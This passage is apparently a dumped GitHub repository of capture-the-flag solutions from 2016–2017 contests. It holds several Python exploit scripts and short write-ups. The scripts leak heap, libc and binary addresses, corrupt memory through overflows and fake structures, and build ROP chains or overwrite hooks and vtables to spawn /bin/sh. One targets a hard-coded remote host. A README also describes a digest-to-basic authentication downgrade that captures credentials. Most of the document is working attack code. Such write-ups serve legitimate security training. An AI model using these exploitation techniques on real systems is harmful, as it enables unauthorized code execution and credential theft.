recvuntil('--> ') 43 | s.send('1\n') 44 | 45 | def exit_menu(): 46 | recvuntil('--> ') 47 | s.send('4\n') 48 | 49 | def change_name_zero(name): 50 | name += '\x00' 51 | while '\x00' in name: 52 | name = name[:name.rfind('\x00')] 53 | tmp = name.replace('\x00', 'A') 54 | # print '[+] changing name to %s' % tmp.encode('hex') 55 | change_name(tmp) 56 | 57 | def set_small(n): 58 | recvuntil('--> ') 59 | s.send('2\n') 60 | recvuntil('--> ') 61 | s.send(str(n) + '\n') 62 | 63 | def set_large(n): 64 | recvuntil('--> ') 65 | s.send('3\n') 66 | recvuntil('--> ') 67 | s.send(str(n) + '\n') 68 | 69 | def print_entries(): 70 | recvuntil('--> ') 71 | s.send('2\n') 72 | return recvuntil('\n\n') 73 | 74 | def leak(addr): 75 | # overwrite the Small field of the next entry, that is printed with %s later 76 | rndname = ''.join([str(random.randint(0, 9)) for i in range(8)]) 77 | add_entry() 78 | change_name_zero(rndname + 'A'*248 + p64(addr)) 79 | exit_menu() 80 | 81 | add_entry() 82 | exit_menu() 83 | 84 | t = print_entries() 85 | t = t[t.find('Name: ' + rndname):] 86 | t = t[t[1:].find('Name: '):] 87 | t = t[:t.find('\nLarge')] 88 | t = t[t.find('Small: ') + len('Small: '):] 89 | return t 90 | 91 | def overwrite(addr, value, bb=False, val=0, zero=True): 92 | # overwrite the next field of the next entry, so that end_of_entry will 93 | # return that address (keep in mind that there should be a zero at addr - val - 8) 94 | print '[+] write %#x @ %#x' % (value, addr) 95 | add_entry() 96 | change_name_zero('A'*256 + p64(0) + p64(addr - 0x18 - val)) 97 | exit_menu() 98 | 99 | add_entry() 100 | set_small(0) 101 | set_large(0) 102 | if zero: 103 | change_name_zero('A'*val + p64(value)) 104 | else: 105 | change_name('A'*val + p64(value)) 106 | exit_menu() 107 | 108 | 109 | prog_base = 0x4000000000 110 | 111 | # set large, so that it points to a malloc chunk 112 | add_entry() 113 | set_large(0x100) 114 | exit_menu() 115 | 116 | # get the address on the heap 117 | t = print_entries() 118 | t = t[t.index('Large: ') + len('Large: '):] 119 | t = int(t[:t.index('\n')], 16) 120 | heap_addr = t - 272 # address of first entry 121 | heap_base = heap_addr & ~0xfff 122 | print '[+] heap address = %#x' % heap_addr 123 | print '[+] heap base = %#x' % heap_base 124 | 125 | # at heap_base + 0x10 there is a pointer to end_of_entry 126 | t = leak(heap_base + 0x10) 127 | end_of_entry = u64(t.ljust(8, '\x00')) 128 | if is_local: end_of_entry = 0x0000004000000f54 129 | print '[+] end_of_entry @ %#x' % end_of_entry 130 | 131 | prog_base = end_of_entry - 0xf54 132 | print '[+] prog base = %#x' % prog_base 133 | 134 | printf_got = 0x122E0 135 | malloc_got = 0x012298 136 | printf_offset = 0x0004f09c 137 | system_offset = 0x0003ffd0 138 | magic_gadget_offset = 0x0A1D74 139 | 140 | # get a leak inside the libc 141 | t = leak(prog_base + printf_got) 142 | printf_addr = u64(t.ljust(8, '\x00')) 143 | if is_local: printf_addr += 0x4000000000 144 | libc_base = printf_addr - printf_offset 145 | system_addr = libc_base + system_offset 146 | 147 | print '[+] libc base = %#x' % libc_base 148 | print '[+] printf address = %#x' % printf_addr 149 | print '[+] system address = %#x' % system_addr 150 | 151 | fp_ptr = 0x12200 + prog_base 152 | bss = 0x12690 + prog_base 153 | 154 | # end_of_entry is called with a pointer to the first entry in the heap, so 155 | # let's write /bin/sh there 156 | overwrite(heap_addr, u64('/bin/sh'.ljust(8, '\x00')), val=8) 157 | # overwrite a ptr to ptr to end_of_entry to make it point to system 158 | overwrite(bss + 0x50, system_addr) 159 | overwrite(bss, bss + 0x50) 160 | overwrite(fp_ptr, bss, zero=False) 161 | 162 | # trigger a call to end_of_entry/system 163 | add_entry() 164 | set_small(0) 165 | s.send('cat flag\n') 166 | print s.recv(1024) 167 | 168 | interactive() 169 | 170 | s.close() 171 | 172 | -------------------------------------------------------------------------------- /googlectf2016/forced_puns/lib/aarch64-linux-gnu/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/googlectf2016/forced_puns/lib/aarch64-linux-gnu/libc.so.6 -------------------------------------------------------------------------------- /googlectf2016/forced_puns/lib/ld-linux-aarch64.so.1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/googlectf2016/forced_puns/lib/ld-linux-aarch64.so.1 -------------------------------------------------------------------------------- /googlectf2016/opabina_regalis/README.md: -------------------------------------------------------------------------------- 1 | # Opabina regalis 2 | 3 | I worked on these challenges with @pagabuc for some time. 4 | We compiled the Protocol Buffer and started playing with the first challenge. 5 | 6 | ## Token fetch 7 | 8 | Just receiving the first request and forwarding it tells us: 9 | ``` 10 | reply { 11 | status: 200 12 | headers { 13 | key: "Server" 14 | value: "opabina-regalis.go" 15 | } 16 | body: "

this isn\'t the token you\'re looking for

" 17 | } 18 | ``` 19 | Let's just changing the request uri with `/token` and you get the flag 20 | 21 | ## Downgrade attack 22 | 23 | This time if we just forward the request we get this message: 24 | ``` 25 | reply { 26 | status: 401 27 | headers { 28 | key: "Server" 29 | value: "opabina-regalis.go" 30 | } 31 | headers { 32 | key: "WWW-Authenticate" 33 | value: "Digest realm=\"In the realm of hackers\",qop=\"auth\",nonce=\"38c004ab191ad188\",opaque=\"38c004ab191ad188\"" 34 | } 35 | headers { 36 | key: "Content-Length" 37 | value: "12" 38 | } 39 | body: "Unauthorized" 40 | } 41 | ``` 42 | 43 | It seems like there is Digest Authentication on the server. After looking 44 | around on the Web we found out it was possible to do a, guess what, downgrade 45 | attack. You just need to make the client believe the server requested a basic 46 | authentication and wait for the client to send you the username and the 47 | password in clear (well, they are encoded with base64). 48 | 49 | Once you get username and password, you can reply to the server with the Digest 50 | authorization header and use username and password to calculate the response 51 | field (by looking at the RFC). You just need to ask for the page 52 | '/protected/secret' to get the flag. 53 | 54 | ## Redirect 55 | 56 | You can see again a Digest authentication, but trying the downgrade attack 57 | doesn't work this time (of course). 58 | 59 | Simply forwarding the messages from the server to the client, we arrive to a 60 | page that says it's not the token we're looking for. We can change the uri of 61 | the first request with '/protected/secret' and get the flag. 62 | 63 | ## SSL Stripping 64 | 65 | Looking at the first request we can see it's asking for the root page and it 66 | returns an HTML page. We can save and open it to see there's a form where we 67 | need to fill email and password. The form is submitted to 68 | `https://elided/user/sign_in`. Just asking for the `/user/sign_in` page was 69 | enough to get the flag. 70 | 71 | ## Input Validation 72 | 73 | Looking at the first messages it seems like this challenge is really similar to 74 | the Downgrade attack ones, so we reused the same script and we ended up in the 75 | `/protected/joke` page. Considering we probably want to go again to 76 | `/protected/token`, we can change the uri of the request and get the flag. 77 | -------------------------------------------------------------------------------- /googlectf2016/opabina_regalis/downgrade_attack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import proto_pb2 3 | import socket 4 | import struct 5 | import random 6 | import ssl 7 | import md5 8 | 9 | def mysend(msg): 10 | length = struct.pack("subfilesdirs[i] ) 47 | { 48 | ptr_sz = &folder->size; 49 | copy_string(s, folder->subfilesdirs[i]->name); 50 | if ( folder->subfilesdirs[i]->is_folder == 1 ) 51 | { 52 | *ptr_sz = *ptr_sz; 53 | } 54 | else 55 | { 56 | printf("%s : size %ld\n", s, folder->subfilesdirs[i]->size); 57 | *ptr_sz += folder->subfilesdirs[i]->size; 58 | } 59 | } 60 | ++i; 61 | } 62 | printf("The size of the folder is %ld\n", folder->size); 63 | ``` 64 | 65 | The buffer `s` is just 24 bytes, but the name can be 31 chars, so here is where 66 | the buffer overflow happens. It appears that we are able to overwrite just the 67 | `ptr` variable, that is then dereferenced with: 68 | ```C 69 | *ptr_sz += folder->subfilesdirs[i]->size; 70 | ``` 71 | 72 | This looks like a write primitive that allow us to modify the value of any 73 | address we want: just put the address inside the name of a new file and set its 74 | size in such a way that the old value plus the file size is equal to the 75 | desired final value. 76 | 77 | There are two problems though. First, we don't know any address, not even the 78 | ones of the binary itself (because of PIE). Second, we need the value at a 79 | specific address before changing it. Thus we absolutely need a leak. Looking 80 | carefully at `copy_string` function: 81 | ```C 82 | void *copy_string(void *a1, const char *a2) 83 | { 84 | size_t n; 85 | 86 | n = strlen(a2); 87 | return memcpy(a1, a2, n); 88 | } 89 | ``` 90 | It uses a memcpy, so it doesn't put the `\0` at the end of the buffer and if I 91 | have a name with just 24 bytes, the following `printf` in the "calculate size" 92 | function will print `s` with some "garbage" after it, that is the content of 93 | `ptr_sz` that lies just after `s`. 94 | 95 | So I have a pointer inside the heap (because `ptr_sz` would point to 96 | `&folder->size`). I couldn't leak whatever I want, yet. 97 | 98 | On the heap there is the folder structure that contains, among other things, 99 | pointers to subfolders and files inside a dir. It looks like this: 100 | ```C 101 | struct folder_t { 102 | struct folder_t **subfilesdirs; 103 | struct folder_t *parent_folder; 104 | char name[32]; 105 | long size; 106 | int is_folder; 107 | char field_84; 108 | } 109 | ``` 110 | 111 | How can I use it to leak some info? The "list" function prints all 112 | subfolders/files inside a dir and in particular it prints the names. By 113 | creating a fake sub-folder that points to the address I want to leak (-88 114 | because of the offset of the `name` field inside the structure), I can get the 115 | data I want. The idea is this: 116 | * create two files with the right name/size (see exp.py for more details) 117 | * calculate the size of the current folder. At this point, the files that I 118 | just created should trigger the vuln and write the fake sub-folder pointer in 119 | the root folder (detail: I needed two files to make it work because the sizes 120 | are just 32bits but the pointer I want to write is 64). 121 | * list all subfolders/files to leak the data pointed by the fake sub-folder 122 | * delete the two previous files to keep the state of the program clean 123 | 124 | At this point I had a leak, but I wasn't able to find anything useful on the 125 | heap that pointed to other libraries or to the binary itself. I played a little 126 | bit with the heap by creating and deleting dirs, so that free would place some 127 | libc pointers in the free chunks. Then, I leaked the values and knew where the 128 | libc was. 129 | 130 | Inside the libc I found a pointer to the stack(it was the `environ` pointer) 131 | and from there a pointer inside the binary. At that point I had everything 132 | needed to hijack the control flow of the program. 133 | 134 | The write primitive is pretty much like the read one: 135 | * create two files with the right name/size 136 | * calculate the size of the current folder, so that the two files trigger the 137 | vuln that writes the value at the address I want 138 | * delete the two previous files to keep the state of the program clean 139 | 140 | To be honest, I immediately tried to overwrite the GOT, but obviously it failed 141 | (by the time I got here I forgot about Full RELRO :) ). After this, I tried to 142 | overwrite the return address of the "calculate size" function itself. Since I 143 | needed more than one use of the vuln to prepare the ROP chain, I couldn't 144 | directly overwrite the return address, but I placed the chain some bytes above 145 | the main stack frame. When all was set, I overwrote the return address with a 146 | stack-pivoting gadget, to execute `system('/bin/sh')` and get a shell. 147 | 148 | The exploit wasn't 100% reliable, but it worked :) 149 | 150 | 151 | 152 | 153 | If you find any mistake or have a better solution, feel free to open an issue 154 | or contact me! 155 | -------------------------------------------------------------------------------- /hitcon2016quals/shellingfolder/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from pwn import * 4 | import sys 5 | 6 | local = len(sys.argv) <= 1 7 | if local: 8 | p = process('./shellingfolder_42848afa70a13434679fac53a471239255753260') 9 | # gdb.attach(p, ''' 10 | # source ~/ctf-tools/peda/peda/peda.py 11 | # continue 12 | # ''') 13 | else: 14 | p = remote('52.69.237.212', 4869) 15 | 16 | def readmenu(): 17 | p.recvuntil('ShellingFolder') 18 | p.recvuntil('**************************************') 19 | p.recvuntil('**************************************') 20 | 21 | def create_file(s, size=0): 22 | readmenu() 23 | p.sendline('4') 24 | p.recvuntil('Name of File:') 25 | p.sendline(s[:30]) 26 | p.recvuntil('Size of File:') 27 | ssize = u32(p32(size)) 28 | p.sendline(str(ssize)) 29 | p.recvuntil('successful\n') 30 | 31 | def create_dir(s): 32 | readmenu() 33 | p.sendline('3') 34 | p.recvuntil('Name of Folder:') 35 | p.sendline(s) 36 | p.recvuntil('successful\n') 37 | 38 | def delete_file(s): 39 | readmenu() 40 | p.sendline('5') 41 | p.recvuntil('Choose a Folder or file :') 42 | p.sendline(s) 43 | 44 | def leak_heap(): 45 | filename = 'B'*24 46 | create_file(filename) 47 | readmenu() 48 | p.sendline('6') 49 | t = p.recvuntil('**************************************') 50 | t = t[t.index(':')+1:] 51 | t = t[:t.index(' : size')] 52 | t = t[24:].ljust(8, '\x00') 53 | res = u64(t) 54 | delete_file(filename) 55 | return res 56 | 57 | old_first_subfolder = None 58 | g_a = 'A' 59 | 60 | def leak_prep(root, addr, is_hi, old_n): 61 | global g_a 62 | filename = g_a*24 + p64(root) 63 | g_a = chr(ord(g_a) + 1) 64 | 65 | if is_hi: 66 | addr = (addr >> 32) 67 | old = (old_n >> 32) 68 | size = addr - old 69 | old_n = (addr << 32) | (old_n & 0xffffffff) 70 | else: 71 | neg = False 72 | old = old_n & 0xffffffff 73 | addr = addr & 0xffffffff 74 | 75 | if addr < old: 76 | old += 0x100000000 77 | 78 | size = addr - old 79 | if size > 0x7fffffff: 80 | neg = True 81 | 82 | old_n = (((old_n >> 32) - (1 if neg else 0)) << 32) | (addr & 0xffffffff) 83 | 84 | size = size & 0xffffffff 85 | create_file(filename, size=size) 86 | return filename[:filename.index('\x00')], old_n 87 | 88 | def leak(root, addr): 89 | global old_first_subfolder 90 | # prepare the files to write addr - 88 inside the 10th sub folder of the root dir 91 | addr -= 88 92 | f1, old_first_subfolder = leak_prep(root + 9 * 8, addr, False, old_first_subfolder) 93 | f2, old_first_subfolder = leak_prep(root + 9 * 8 + 4, addr, True, old_first_subfolder) 94 | old_first_subfolder = addr 95 | 96 | # trigger the vuln to overwrite the 10th sub folder pointer 97 | t = '' 98 | readmenu() 99 | p.sendline('6') 100 | 101 | # leak data with the list function 102 | readmenu() 103 | p.sendline('1') 104 | t = p.recvuntil('**************************************') 105 | t = t[t.index('----------------------\n')+len('----------------------\n'):] 106 | t = t[:t.index('-------------')] 107 | t = t.split('\n')[-2] 108 | if t.startswith('\x1B[32m'): 109 | t = t[len('\x1B[32m'):] 110 | if t.endswith('1b5b306d'.decode('hex')): 111 | t = t[:t.index('1b5b306d'.decode('hex'))] 112 | 113 | delete_file(f1) 114 | delete_file(f2) 115 | return t 116 | 117 | def leak_addr(root, addr): 118 | return u64(leak(root, addr)[:8].ljust(8, '\x00')) 119 | 120 | old_write_addr = None 121 | def write(addr, val, exploit=False): 122 | global old_write_addr 123 | # prepare the files to write the value at addr 124 | f1, old_write_addr = leak_prep(addr, val, False, old_write_addr) 125 | f2, old_write_addr = leak_prep(addr + 4, val, True, old_write_addr) 126 | old_write_addr = val 127 | 128 | # trigger the vuln to overwrite addr 129 | readmenu() 130 | p.sendline('6') 131 | 132 | if exploit: 133 | p.recvuntil('The size of the folder is') 134 | p.recvuntil('\n') 135 | p.sendline('ls /home/shellingfolder/') 136 | p.interactive() 137 | sys.exit(1) 138 | 139 | delete_file(f1) 140 | delete_file(f2) 141 | 142 | # leak an heap address 143 | heap_leak = leak_heap() 144 | root_folder = heap_leak - 0x78 145 | heap_base = root_folder - 0x10 146 | old_first_subfolder = 0 147 | print '[+] heap_leak = %#x' % (heap_leak,) 148 | print '[+] root folder = %#x' % (root_folder,) 149 | print '[+] heap_base = %#x' % (heap_base,) 150 | 151 | # # try to leak an address in the libc 152 | create_dir('AAAA') 153 | create_dir('BBBB') 154 | create_dir('CCCC') 155 | create_dir('DDDD') 156 | create_dir('EEEE') 157 | delete_file('DDDD') 158 | delete_file('BBBB') 159 | delete_file('AAAA') 160 | 161 | # now there should be some libc addresses on the heap (bins pointers) 162 | libc_leak = leak_addr(root_folder, heap_base + 0x130) 163 | libc_base = libc_leak - 2936 164 | print '[+] libc_leak = %#x' % (libc_leak,) 165 | print '[+] libc_base = %#x' % (libc_base,) 166 | 167 | stack_address_in_heap = libc_base + 0x2f98 168 | print '[+] stack leak should be @ %#x' % (stack_address_in_heap,) 169 | 170 | # get a leak of the stack. from there we should be able to read some pointer of the executable 171 | environ_stack = leak_addr(root_folder, stack_address_in_heap) 172 | print '[+] stack_leak = %#x' % (environ_stack,) 173 | hlt_addr = leak_addr(root_folder, environ_stack - 0x30) 174 | bin_base = hlt_addr - 0xac9 175 | func_ret = environ_stack - 240 - 0x20 176 | print '[+] binary base = %#x' % (bin_base,) 177 | print '[+] func return @ %#x' % (func_ret,) 178 | 179 | libc_code_base = libc_base - 0x3c3000 180 | system_addr = libc_code_base + 0x45380 181 | print '[+] system @ %#x' % (system_addr,) 182 | 183 | # write things on the stack, in an area that is never touched (just above the 184 | # main function stack frame) 185 | stack_pivot = libc_code_base + 0x8dd0e 186 | poprdi = libc_code_base + 0x21102 187 | binsh_addr = libc_code_base + 0x0018c58b 188 | chain = [poprdi, binsh_addr, system_addr] 189 | for idx, addr in enumerate(range(func_ret + 0x100 + 8, func_ret + 0x100 + 8 + 8 * len(chain), 8)): 190 | if idx == 0: 191 | old_write_addr = 0 192 | else: 193 | buf = [] 194 | t = leak(root_folder, addr) 195 | if t == '': 196 | buf.append(t.ljust(4, '\x00')) 197 | buf.append(leak(root_folder, addr + 4)[:4].ljust(4, '\x00')) 198 | else: 199 | buf.append(t.ljust(8, '\x00')) 200 | old_write_addr = u64(''.join(buf).ljust(8, '\x00')) 201 | 202 | print '[i] writing %#x to %#x (old value %#x)' % (chain[idx], addr, old_write_addr) 203 | write(addr, chain[idx]) 204 | 205 | # return address of "calculate size" function 206 | old_write_addr = bin_base + 0x1669 207 | # now overwrite the return address of the "calculate size" function itself, so 208 | # that it will pivot the stack and start executing the ROP chain we created before. 209 | print '[i] writing %#x to %#x (old value %#x)' % (stack_pivot, func_ret, old_write_addr) 210 | write(func_ret, stack_pivot, True) 211 | 212 | p.interactive() 213 | p.close() 214 | -------------------------------------------------------------------------------- /hitcon2016quals/shellingfolder/libc.so.6_375198810bb39e6593a968fcbcf6556789026743: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/hitcon2016quals/shellingfolder/libc.so.6_375198810bb39e6593a968fcbcf6556789026743 -------------------------------------------------------------------------------- /hitcon2016quals/shellingfolder/shellingfolder_42848afa70a13434679fac53a471239255753260: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/hitcon2016quals/shellingfolder/shellingfolder_42848afa70a13434679fac53a471239255753260 -------------------------------------------------------------------------------- /ndh2016/night_deamonic_heap/exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import sys, socket, telnetlib 4 | from struct import * 5 | 6 | def recvuntil(t): 7 | data = '' 8 | while not data.endswith(t): 9 | tmp = s.recv(1) 10 | if not tmp: break 11 | data += tmp 12 | 13 | return data 14 | 15 | def interactive(): 16 | t = telnetlib.Telnet() 17 | t.sock = s 18 | t.interact() 19 | 20 | def p32(x): return pack('') 33 | def neww(name): 34 | return new('w', name) 35 | 36 | def delete(name): 37 | s.send('delete %s\n' % name) 38 | recvuntil('>') 39 | 40 | def printall(receive=True): 41 | s.send('print all\n') 42 | if receive: 43 | return recvuntil('>') 44 | 45 | def change(oldn, newn): 46 | s.send('change %s %s\n' % (oldn, newn)) 47 | recvuntil('>') 48 | 49 | recvuntil('>') 50 | 51 | # the idea is to have one Character structure (X) that overlaps with the name 52 | # of another character, in such a way that the name points to the name pointer 53 | # of the structure X. 54 | neww('A'*(0x100 - 9)) 55 | neww('B'*(0x100 - 9)) 56 | neww('C'*(0x7)) 57 | neww('D'*(0x7)) 58 | neww('E'*(0x7)) 59 | neww('F'*(0x7)) 60 | neww('G'*(0x7)) 61 | # Pa|Na|Pb|Nb|Pc|Nc|Pd|Nd|Pe|Ne|Pf|Nf|Pg|Ng 62 | change('W'+'B'*(0x100-9), 'B'*(0x200-9)) 63 | # Pa|Na|Pb| |Pc|Nc|Pd|Nd|Pe|Ne|Pf|Nf|Pg|Ng|Nb 64 | change('W'+'D'*(0x7), 'd'*(25)) 65 | # Pa|Na|Pb|Nd| |Pc|Nc|Pd| |Pe|Ne|Pf|Nf|Pg|Ng|Nb 66 | change('W'+'E'*(0x7), 'e'*(0x70 - 8)) 67 | # Pa|Na|Pb|Nd|Ne|Pc|Nc|Pd| |Pe| |Pf|Nf|Pg|Ng|Nb 68 | delete('B'*(0x200-9)) 69 | # Pa|Na| |Nd|Ne|Pc|Nc|Pd| |Pe| |Pf|Nf|Pg|Ng 70 | change('d'*(25), 'D'*(0x200-9)) 71 | # Pa|Na| |Ne|Pc|Nc|Pd| |Pe| |Pf|Nf|Pg|Ng|Nd 72 | change('W'+'C'*(0x7), 'c'*(0x100 - 9)) 73 | # Pa|Na|Nc| |Ne|Pc| |Pd| |Pe| |Pf|Nf|Pg|Ng|Nd 74 | change('c'*(0x100 - 9), 'C'*(0x200 - 9)) 75 | # Pa|Na| |Ne|Pc| |Pd| |Pe| |Pf|Nf|Pg|Ng|Nd|Nc 76 | 77 | # after these operations, the freed space between Na and Ne should be the only one in the unsorted bin. 78 | # If we now overwrite its size, we can have the overlap we want. 79 | 80 | delete('W'+'A'*(0x100-9)) 81 | neww('A'*(0x100 - 9) + '\xf1') # overwrite the size of the freed chunk between Na and Ne 82 | 83 | # add some space between Na and Ne, so that the Character structure will 84 | # overlap in a such a way that the name pointer will be available through Ne 85 | change('W'+'F'*(0x7), 'f'*(0x38 - 9)) 86 | neww('J'*(0x200-9)) # the Character structure of this new wizard should now overlap with Ne 87 | 88 | # leak the address on the heap 89 | r = printall() 90 | l = [x[len('My name is : '):] for x in r.split('\n') if 'My name is : ' in x] 91 | heap_leak = l[l.index('D'*(0x200-9)) + 1] 92 | heap_leak += '\x00'*(8 - len(heap_leak)) 93 | heap_leak = u64(heap_leak) 94 | pers_A = heap_leak - 0xda0 95 | print '[+] heap_leak = %#x' % heap_leak 96 | print '[+] personnage A @ %#x' % pers_A 97 | 98 | def leak(addr, oldname): 99 | newname = p64(addr) 100 | change(oldname, newname) 101 | r = printall() 102 | l = [x[len('My name is : '):] for x in r.split('\n') if 'My name is : ' in x] 103 | v = l[l.index('W'+'A'*(0x100-8)) + 1] 104 | v += '\x00'*(8 - len(v)) 105 | v = u64(v) 106 | return v, newname 107 | 108 | def write(addr, oldvalue, value, oldname): 109 | change(oldname, p64(addr)) 110 | change(p64(oldvalue), p64(value)) 111 | 112 | def send_wzero(orig_name, v): 113 | oldname = orig_name 114 | for idx, i in enumerate(p64(v)[::-1]): 115 | if i == '\x00': 116 | newname = p64(v)[:8 - idx - 1].replace('\x00', '1') 117 | change(oldname, newname) 118 | oldname = newname 119 | 120 | wizzard_tbl_off = 0x0000000000203C48 121 | strlen_got_off = 0x0000000000203F50 122 | free_got_off = 0x0000000000203F48 123 | free_off = 0x00083c60 124 | magicgadget_off = 0x00000000000EC622 125 | 126 | vtbl, newname = leak(pers_A, p64(heap_leak)) 127 | prog_base = vtbl - wizzard_tbl_off 128 | print '[+] wizzard vtbl @ %#x' % vtbl 129 | print '[+] prog_base @ %#x' % prog_base 130 | 131 | strlen_got = prog_base + strlen_got_off 132 | free_got = prog_base + free_got_off 133 | print '[i] strlen_got @ %#x' % strlen_got 134 | print '[i] free_got @ %#x' % free_got 135 | strlen_addr, newname = leak(strlen_got, newname) 136 | free_addr, newname = leak(free_got, newname) 137 | 138 | print '[+] strlen @ %#x' % strlen_addr 139 | print '[+] free @ %#x' % free_addr 140 | 141 | # looking at the strings in the binary you can find "GCC: (GNU) 5.3.1 20151207 (Red Hat 5.3.1-2)" and "GLIBC_2.2.5" 142 | # after trying some libraries online, I found the correct one. 143 | print '... somehow now you know the libc version ... (Fedora 23 libc)' 144 | 145 | libc_base = free_addr - free_off 146 | magicgadget = libc_base + magicgadget_off 147 | print '[+] libc_base = %#x' % libc_base 148 | 149 | # prepare the fake virtual table 150 | neww('K'*(0x300-10)) 151 | send_wzero('W'+'K'*(0x300-9), magicgadget) 152 | 153 | pers_K_off = 0x10a0 154 | pers_K = pers_A + pers_K_off 155 | pers_F = pers_A + 0x760 156 | # overwrite the virtual table ptr of the first character. It now points to the fake virtual table 157 | write(pers_F, vtbl, pers_K, newname) 158 | 159 | printall(receive=False) 160 | 161 | interactive() 162 | 163 | s.close() 164 | -------------------------------------------------------------------------------- /ndh2016/night_deamonic_heap/role_gaming: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/ndh2016/night_deamonic_heap/role_gaming -------------------------------------------------------------------------------- /sctf2016/pwn2/pwn2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/sctf2016/pwn2/pwn2 -------------------------------------------------------------------------------- /sctf2016/pwn2/pwn2_bf.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import sys, socket, telnetlib 4 | from struct import * 5 | 6 | def p32(x): return pack('> ') 15 | p.sendline('2') 16 | p.recvuntil('(Y/n) ') 17 | p.sendline('n') 18 | p.recvuntil('>> ') 19 | p.sendline('oshima') 20 | p.recvuntil('>> ') 21 | p.sendline(s) 22 | 23 | def write_value(old_value, addr, value, bb = 8): 24 | orig_addr = addr 25 | n_value, o_value = value, old_value 26 | for i in range(bb): 27 | n_off = n_value & 0xff 28 | o_off = o_value & 0xff 29 | 30 | if n_off > o_off: 31 | off = (n_off - o_off) 32 | print '[+] n_off = %#x, o_off = %#x, off = %#x' % (n_off, o_off, off) 33 | trigger('yes' + '\x00' * 29 + p64(addr - 0x10) + p8(off / 2, sign=True)) 34 | trigger('yes' + '\x00' * 29 + p64(addr - 0x10) + p8(off / 2, sign=True)) 35 | if off % 2 == 1: 36 | trigger('yes' + '\x00' * 29 + p64(addr - 0x10) + p8(1, sign=True)) 37 | else: 38 | off = (o_off - n_off) / 2 39 | print '[+] n_off = %#x, o_off = %#x, off = %#x' % (n_off, o_off, off) 40 | trigger('yes' + '\x00' * 29 + p64(addr - 0x10) + p8(-off / 2, sign=True)) 41 | trigger('yes' + '\x00' * 29 + p64(addr - 0x10) + p8(-off / 2, sign=True)) 42 | if off % 2 == 1: 43 | trigger('yes' + '\x00' * 29 + p64(addr - 0x10) + p8(-1, sign=True)) 44 | 45 | n_value = n_value >> 8 46 | o_value = o_value >> 8 47 | addr += 1 48 | 49 | return value 50 | 51 | def leak_addr(old_addr, addr, name_addr): 52 | orig_name_addr = name_addr 53 | p_addr, o_name = addr, old_addr 54 | for i in range(4): 55 | p_off = p_addr & 0xff 56 | o_off = o_name & 0xff 57 | 58 | off = p_off - o_off 59 | if off < -0x80: 60 | p_off = (p_addr & 0xff) + 0x100 61 | o_off = o_name & 0xff 62 | off = p_off - o_off 63 | p_addr -= 0x100 64 | 65 | print '[+] p_off = %#x, o_off = %#x, off = %#x' % (p_off, o_off, off) 66 | trigger('yes' + '\x00' * 29 + p64(name_addr - 0x10) + p8(off, sign=True)) 67 | p_addr = p_addr >> 8 68 | o_name = o_name >> 8 69 | name_addr += 1 70 | 71 | p.recvuntil('>> ') 72 | p.sendline('2') 73 | p.recvuntil('(Y/n) ') 74 | p.sendline('Y') 75 | t = p.recvuntil('>> ') 76 | 77 | val = u64(t.split('\n')[3][2:].ljust(8, '\x00')) 78 | p.sendline('Shinonome') 79 | if val == 0: 80 | val, addr = leak_addr(addr, addr+1, orig_name_addr) 81 | val = (val << 8) 82 | 83 | return val, addr 84 | 85 | list_addr = 0x602028 86 | printf_addr = 0x601fb0 87 | ojima_addr = 0x000400EEB 88 | 89 | # trigger vuln to increment the name pointer of the chunk at heap_base + 0x10 90 | for i in range(0x20): 91 | # print i 92 | trigger('yes' + '\x00' * 28) 93 | 94 | p.recvuntil('>> ') 95 | p.sendline('2') 96 | p.recvuntil('(Y/n) ') 97 | p.sendline('Y') 98 | t = p.recvuntil('>> ') 99 | 100 | heap_addr = u64(t.split('\n')[3][2:].ljust(8, '\x00')) - 0x70 101 | old_name = heap_addr + 0x50 102 | print '[+] heap base @ %#x' % (heap_addr,) 103 | 104 | p.sendline('Shinonome') 105 | 106 | 107 | # trigger vuln to overwrite name of first chunk with got addr 108 | name_addr = heap_addr + 0x10 109 | libc_leak, old_name = leak_addr(old_name, printf_addr, name_addr) 110 | print '[+] libc leak = %#x' % (libc_leak,) 111 | libc_base = libc_leak - 0x55800 112 | print '[+] libc base @ %#x' % (libc_base,) 113 | 114 | malloc_hook_addr = libc_leak + 0x36f310 115 | magic_gadget_addr = libc_base + 0x6f5a6 116 | magic_gadget_addr = libc_base + 0xF0274 117 | print '[+] malloc_hook @ %#x' % (malloc_hook_addr,) 118 | print '[+] magic_gadget @ %#x' % (magic_gadget_addr,) 119 | 120 | new_value = write_value(0x0, malloc_hook_addr, magic_gadget_addr) 121 | lv_addr = 0x00602010 122 | trigger('yes' + '\x00' * 29 + p64(lv_addr - 0x10) + p8(-1, sign=True)) 123 | 124 | p.recvuntil('>> ') 125 | p.sendline('1') 126 | p.recvuntil('>> ') 127 | p.sendline('something') 128 | 129 | p.interactive() 130 | -------------------------------------------------------------------------------- /seccon2017/printfmachine/.gdb_history: -------------------------------------------------------------------------------- 1 | r 2 | info stack 3 | r ./debug.fs 4 | info stack 5 | b main 6 | r 7 | b 0x555555554810 + 0x55f 8 | b *(0x555555554810 + 0x55f) 9 | r default.fs 10 | c 11 | x/32c $rbp-0x460 12 | x/48c $rbp-0x460 13 | x/32c $rbp-0x460 14 | x/32c $rbp-0x450 15 | x/32c $rbp-0x460 16 | x/16c $rbp-0x460 17 | x/32c $rbp-0x460 18 | c 19 | x/32c $rbp-0x460 20 | c 21 | x/32c $rbp-0x460 22 | c 23 | x/32c $rbp-0x460 24 | x/32c $rbp-0x460 25 | c 26 | display/32c $rbp-0x460 27 | c 28 | display/32xc $rbp-0x460 29 | c 30 | c 31 